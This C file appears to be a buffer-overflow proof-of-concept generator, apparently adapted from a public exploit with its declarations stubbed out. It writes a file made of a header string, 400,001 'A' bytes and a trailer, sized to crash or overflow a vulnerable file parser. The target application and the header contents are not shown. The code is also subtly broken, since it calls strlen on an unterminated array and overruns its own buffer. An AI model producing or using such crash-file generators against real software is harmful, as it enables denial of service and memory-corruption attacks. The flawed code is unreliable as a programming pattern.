
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int buff ;


 char* FFORMAT ;
 int fclose (int *) ;
 int * fopen (char*,char*) ;
 int * fp ;
 int fwrite (char*,int,int,int *) ;
 int memcpy (char*,char*,int) ;
 int memset (char*,int,int) ;
 int perror (char*) ;
 int printf (char*,char*) ;
 char* shocke ;
 char* shocks ;
 int strlen (char*) ;

int main(int argc, char *argv[])
{
 char buff[409008];
 char junk[400001];

 memset(junk,0x41,400001);

 memcpy(buff,shocks,strlen(shocks));
 memcpy(buff+strlen(shocks),junk,strlen(junk));
 memcpy(buff+strlen(shocks)+strlen(junk),shocke,strlen(shocke));

 fp = fopen(FFORMAT,"wb");

 if(fp==((void*)0))
 {
  perror ("\nUweeepa! Can't open file.\n");
 }

 fwrite(buff,1,sizeof(buff),fp);

 fclose(fp);

 printf("\nFile %s successfully created!\n\a", FFORMAT);

 return 0;

}
